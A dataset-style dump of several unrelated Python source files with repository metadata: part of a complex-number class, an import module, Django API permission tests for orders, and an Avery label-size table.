if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return not self == other
except ValueError as err:
print_err(err)
# Operator overloading 12: +=
def __iadd__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
self.re += other.re
self.im += other.im
return Complex(self.re, self.im, self.restore)
except ValueError as err:
print_err(err)
# Operator overloading 13: -=
def __isub__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
self.re -= other.re
self.im -= other.im
return Complex(self.re, self.im, self.restore)
except ValueError as err:
print_err(err)
# Operator overloading 14: *=
def __imul__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
self.re = self.re * other.re - self.im * other.im
self.im = self.re * other.im + self.im * other.re
return Complex(self.re, self.im, self.restore)
except ValueError as err:
print_err(err)
# Operator overloading 15: /=
def __idiv__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
den = other * other.con()
num = self * other.con()
if den.re == 0 and self.restore:
print_res()
return Complex(self.re, self.im, self.restore)
self.re = num.re / den.re
self.im = num.im / den.re
return Complex(self.re, self.im, self.restore)
except (ZeroDivisionError, ValueError) as err:
print_err(err)
# Operator overloading 16: //=
def __ifloordiv__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
den = other * other.con()
num = self * other.con()
if den.re == 0 and self.restore:
print_res()
return Complex(self.re, self.im, self.restore)
self.re = num.re // den.re
self.im = num.im // den.re
return Complex(self.re, self.im, self.restore)
except (ZeroDivisionError, ValueError) as err:
print_err(err)
# Operator overloading 17: - (Unary operator)
def __neg__(self):
return Complex(-self.re, -self.im, self.restore)
## Helper functions
# Module function to calculate the modulus of a complex number
def mod(self):
return sqrt(self.re**2 + self.im**2)
# Conjugated of a complex number
def con(self):
return Complex(self.re, - self.im, self.restore)
# Representation function for representing a complex number
def __repr__(self):
if(self.re == 0 and self.im == 0):
output = str(self.re)
if(self.re != 0 and self.im > 0):
output = str(self.re) + ' + ' + str(self.im) + 'j' if(self.im != 1) else str(self.re) + ' + ' + 'j'
if(self.re != 0 and self.im < 0):
output = str(self.re) + ' - ' + str(-self.im) + 'j' if(self.im != -1) else str(self.re) + ' - ' + 'j'
if(self.re != 0 and self.im == 0):
output = str(self.re)
if(self.re == 0 and self.im > 0):
output = str(self.im) + 'j' if(self.im != 1) else 'j'
if(self.re == 0 and self.im < 0):
output = str(self.im) + 'j' if(self.im != -1) else '-j'
return output | 40.135762 | 134 | 0.524462 | 1,387 | 12,121 | 4.511175 | 0.105263 | 0.122743 | 0.130414 | 0.057536 | 0.814927 | 0.808854 | 0.808854 | 0.808854 | 0.802621 | 0.761068 | 0 | 0.008108 | 0.379342 | 12,121 | 302 | 135 | 40.135762 | 0.823608 | 0.081181 | 0 | 0.732075 | 0 | 0 | 0.050064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083019 | false | 0.003774 | 0.007547 | 0.011321 | 0.188679 | 0.086792 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e713dc86c1b640640a69bfd334cf15c35c79763a | 232 | py | Python | project/scripts/clausecat/custom_code.py | svlandeg/healthsea | d3527e96630f59a07dccda7d6eae79e905e98a02 | [
"MIT"
] | 60 | 2021-12-15T17:14:37.000Z | 2022-03-26T18:25:15.000Z | project/scripts/clausecat/custom_code.py | zhinoos-adibi/healthsea | 4481488ed9fc85b89844ee872d0a8412a33f0b15 | [
"MIT"
] | 3 | 2021-12-16T19:50:15.000Z | 2022-03-28T06:10:48.000Z | project/scripts/clausecat/custom_code.py | zhinoos-adibi/healthsea | 4481488ed9fc85b89844ee872d0a8412a33f0b15 | [
"MIT"
] | 9 | 2021-12-15T21:00:05.000Z | 2022-03-17T09:20:51.000Z | import scripts.clausecat.clausecat_component
import scripts.clausecat.clause_segmentation
import scripts.clausecat.clausecat_reader
import scripts.clausecat.clausecat_model
import scripts.clausecat.clause_aggregation
import benepar
| 33.142857 | 44 | 0.905172 | 27 | 232 | 7.592593 | 0.37037 | 0.317073 | 0.536585 | 0.453659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051724 | 232 | 6 | 45 | 38.666667 | 0.931818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e79b1639cdb8b38ec90b91bf3ad9a2a594078a13 | 6,861 | py | Python | backend/pedidos/tests/test_view_permissions.py | JoaoAPS/AlugaInstrumentos | f4001f439c4f96c4de2b194ce268b9d7f95e4512 | [
"MIT"
] | null | null | null | backend/pedidos/tests/test_view_permissions.py | JoaoAPS/AlugaInstrumentos | f4001f439c4f96c4de2b194ce268b9d7f95e4512 | [
"MIT"
] | null | null | null | backend/pedidos/tests/test_view_permissions.py | JoaoAPS/AlugaInstrumentos | f4001f439c4f96c4de2b194ce268b9d7f95e4512 | [
"MIT"
] | null | null | null | from rest_framework import status
from mixer.backend.django import mixer
from pedidos.models import Pedido
from equipamentos.models import Equipamento
def test_pedido_list_view_permissions(
unauthenticatedClient, userClient, adminClient, list_url
):
"""Testa as permissões na list view da api dos pedidos"""
res = unauthenticatedClient.get(list_url)
assert res.status_code == status.HTTP_403_FORBIDDEN
res = userClient.get(list_url)
assert res.status_code == status.HTTP_200_OK
res = adminClient.get(list_url)
assert res.status_code == status.HTTP_200_OK
def test_pedido_retrieve_view_permissions(
unauthenticatedClient, userClient, adminClient, detail_url, user, admin
):
"""Testa as permissões na retrieve view da api dos pedidos"""
res = unauthenticatedClient.get(detail_url(0))
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.get(detail_url(pedido.id))
assert res.status_code == status.HTTP_200_OK
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.get(detail_url(pedido.id))
assert res.status_code == status.HTTP_200_OK
# Pedidos de outros usuários
res = userClient.get(detail_url(pedido.id))
assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_create_view_permissions(
unauthenticatedClient, userClient, adminClient, list_url
):
"""Testa as permissões na create view da api dos pedidos"""
equipamento = mixer.blend(Equipamento)
payload = {'equipamentos': [equipamento.id]}
res = unauthenticatedClient.post(list_url, payload)
assert res.status_code == status.HTTP_403_FORBIDDEN
res = userClient.post(list_url, payload)
assert res.status_code != status.HTTP_403_FORBIDDEN
res = adminClient.post(list_url, payload)
assert res.status_code != status.HTTP_403_FORBIDDEN
def test_pedido_update_view_permissions(
unauthenticatedClient, userClient, adminClient, detail_url, user, admin
):
"""Testa as permissões na update view da api dos pedidos"""
payload = {'equipamentos': []}
res = unauthenticatedClient.patch(detail_url(0), payload)
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.patch(detail_url(pedido.id), payload)
assert res.status_code == status.HTTP_200_OK
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.patch(detail_url(pedido.id), payload)
assert res.status_code == status.HTTP_200_OK
# Pedidos de outros usuários
res = userClient.patch(detail_url(pedido.id), payload)
assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_delete_view_permissions(
unauthenticatedClient, userClient, adminClient, detail_url, user, admin
):
"""Testa as permissões na delete view da api dos pedidos"""
res = unauthenticatedClient.delete(detail_url(0))
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.delete(detail_url(pedido.id))
assert res.status_code == status.HTTP_204_NO_CONTENT
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.delete(detail_url(pedido.id))
assert res.status_code == status.HTTP_204_NO_CONTENT
# Pedidos de outros usuários
res = userClient.delete(detail_url(pedido.id))
assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_add_item_view_permissions(
unauthenticatedClient, userClient, adminClient, add_item_url, user, admin
):
"""Testa as permissões na add_item view da api dos pedidos"""
equipamento = mixer.blend(Equipamento)
payload = {'equipamento': equipamento.id}
res = unauthenticatedClient.post(add_item_url(0), payload)
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.post(add_item_url(pedido.id), payload)
assert res.status_code == status.HTTP_200_OK
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.post(add_item_url(pedido.id), payload)
assert res.status_code == status.HTTP_200_OK
# Pedidos de outros usuários
res = userClient.post(add_item_url(pedido.id), payload)
assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_remove_item_view_permissions(
unauthenticatedClient,
userClient,
adminClient,
remove_item_url,
user,
admin
):
"""Testa as permissões na remove_item view da api dos pedidos"""
equipamento = mixer.blend(Equipamento)
res = unauthenticatedClient.delete(remove_item_url(0, 0))
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
pedido.equipamentos.add(equipamento)
res = userClient.delete(remove_item_url(pedido.id, equipamento.id))
assert res.status_code == status.HTTP_204_NO_CONTENT
pedido = mixer.blend(Pedido, user=admin)
pedido.equipamentos.add(equipamento)
res = adminClient.delete(remove_item_url(pedido.id, equipamento.id))
assert res.status_code == status.HTTP_204_NO_CONTENT
# Pedidos de outros usuários
res = userClient.delete(remove_item_url(pedido.id, equipamento.id))
assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_confirmation_view_permissions(
unauthenticatedClient,
userClient,
adminClient,
confirmation_url,
user,
admin
):
"""Testa as permissões na confirmation view da api dos pedidos"""
res = unauthenticatedClient.post(confirmation_url(0))
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.post(confirmation_url(pedido.id))
assert res.status_code != status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.post(confirmation_url(pedido.id))
assert res.status_code != status.HTTP_403_FORBIDDEN
# Pedidos de outros usuários
res = userClient.post(confirmation_url(pedido.id))
assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_cancelation_view_permissions(
unauthenticatedClient,
userClient,
adminClient,
cancelation_url,
user,
admin
):
"""Testa as permissões na cancelation view da api dos pedidos"""
res = unauthenticatedClient.post(cancelation_url(0))
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.post(cancelation_url(pedido.id))
assert res.status_code != status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.post(cancelation_url(pedido.id))
assert res.status_code != status.HTTP_403_FORBIDDEN
# Pedidos de outros usuários
res = userClient.post(cancelation_url(pedido.id))
assert res.status_code == status.HTTP_404_NOT_FOUND
| 34.134328 | 77 | 0.745518 | 900 | 6,861 | 5.453333 | 0.072222 | 0.062347 | 0.103912 | 0.131622 | 0.894458 | 0.837816 | 0.812958 | 0.791565 | 0.737164 | 0.735126 | 0 | 0.019154 | 0.16295 | 6,861 | 200 | 78 | 34.305 | 0.835452 | 0.101006 | 0 | 0.705882 | 0 | 0 | 0.005723 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.066176 | false | 0 | 0.029412 | 0 | 0.095588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8211e3e36abdcd51bb06e4a6100e2a6655d70ecd | 45,119 | py | Python | pyprototypr/utils/labels_avery.py | gamesbook/pyprototypr | 13a278867baddff78f01e9eb3054b828e8ae03bf | [
"BSD-2-Clause"
] | 1 | 2017-02-05T11:48:43.000Z | 2017-02-05T11:48:43.000Z | pyprototypr/utils/labels_avery.py | gamesbook/pyprototypr | 13a278867baddff78f01e9eb3054b828e8ae03bf | [
"BSD-2-Clause"
] | null | null | null | pyprototypr/utils/labels_avery.py | gamesbook/pyprototypr | 13a278867baddff78f01e9eb3054b828e8ae03bf | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
labels_avery = [
{'3363': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'3421': {'id': 'LP33/70S', 'shape': 'rectangle', 'number': 33, 'width': 70, 'height': 25.4}},
{'3422^': {'id': 'LP24/70S', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 35}},
{'3423^': {'id': 'LP16/105S', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 35}},
{'3425^': {'id': 'LP10/105S', 'shape': 'rectangle', 'number': 10, 'width': 105, 'height': 57}},
{'3426^': {'id': 'LP8/105S', 'shape': 'rectangle', 'number': 8, 'width': 105, 'height': 70}},
{'3448': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3449': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3450': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3451': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3452': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3453': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3454': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3455': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3456': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3457': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3458': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3459': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3470': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3470': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3470': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3471': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3471': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3471': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3472': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3472': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3472': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3473': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3473': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3473': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3474': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3475': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'3478': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3478': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3478': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3483': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3484': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3489': {'id': 'LP30/70', 'shape': 'rectangle', 'number': 30, 'width': 70, 'height': 30}},
{'3490': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'3652': {'id': 'LP21/70', 'shape': 'rectangle', 'number': 21, 'width': 70, 'height': 42.4}},
{'3653': {'id': 'LP14/105', 'shape': 'rectangle', 'number': 14, 'width': 105, 'height': 42.5}},
{'3655': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'3668': {'id': 'LP56/52', 'shape': 'rectangle', 'number': 56, 'width': 52.5, 'height': 21.3}},
{'3669^': {'id': 'LP15/70S', 'shape': 'rectangle', 'number': 15, 'width': 70, 'height': 50}},
{'6070': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6071': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6072': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6073': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6093': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'6094': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6094': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6094': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6102': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'6104': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'6110': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6110': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6110': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6119': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6119': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6119': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6120': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'6122': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'6124': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'6125': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6125': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6125': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6174': {'id': 'LP21/70', 'shape': 'rectangle', 'number': 21, 'width': 70, 'height': 42.4}},
{'6176': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'AB1900': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'AB7000': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'C2160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'C2244^': {'id': 'LP6/72R', 'shape': 'circle', 'number': 6, 'width': 72, 'height': 72}},
{'C2246': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'C2246': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'C2246': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'C2651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'C4167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'C6074': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'C9169': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'C9660': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'C9780': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'CL7059': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'CL7069': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'DL01': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DL01': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DL01': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DL04': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'DL08': {'id': 'LP8/105', 'shape': 'rectangle', 'number': 8, 'width': 105, 'height': 74.2}},
{'DL16': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'DL24^': {'id': 'LP24/70S', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 35}},
{'DL24NZ': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'DPS01': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DPS02': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DPS02': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'DPS02': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'DPS03': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DPS08': {'id': 'LP8/105S', 'shape': 'rectangle', 'number': 8, 'width': 105, 'height': 71}},
{'DPS10': {'id': 'LP10/105', 'shape': 'rectangle', 'number': 10, 'width': 105, 'height': 59.6}},
{'DPS16': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'DPS24': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'DPS30': {'id': 'LP30/70', 'shape': 'rectangle', 'number': 30, 'width': 70, 'height': 30}},
{'DPSO4': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'E3210': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'E3211': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'E3212': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'E3230': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'E3410': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'E3411': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'E3411': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'J2356': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J2356': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J2356': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4720': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'J4721': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'J4722': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'J4773': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J4774': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'J4775': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4775': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4775': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4776': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'J4791': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'J4792': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'J5101': {'id': 'LP20/38', 'shape': 'rectangle', 'number': 20, 'width': 38, 'height': 69}},
{'J5102': {'id': 'LP14/63', 'shape': 'rectangle', 'number': 14, 'width': 63.5, 'height': 38}},
{'J5103': {'id': 'LP10/38', 'shape': 'rectangle', 'number': 10, 'width': 38, 'height': 135}},
{'J6115': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8159': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J8160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'J8161': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'J8162': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'J8163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'J8164': {'id': 'LP12/63', 'shape': 'rectangle', 'number': 12, 'width': 45.7, 'height': 72}},
{'J8165': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'J8165': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'J8166': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'J8167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'J8168': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'J8168': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'J8169': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'J8170': {'id': 'LP24/134', 'shape': 'rectangle', 'number': 24, 'width': 134, 'height': 11}},
{'J8171': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'J8172': {'id': 'LP18/100', 'shape': 'rectangle', 'number': 18, 'width': 100, 'height': 30}},
{'J8173': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'J8173': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'J8177': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'J8359': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J8360': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'J8361': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'J8362': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'J8363': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'J8364': {'id': 'LP12/63', 'shape': 'rectangle', 'number': 12, 'width': 45.7, 'height': 72}},
{'J8365': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'J8365': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
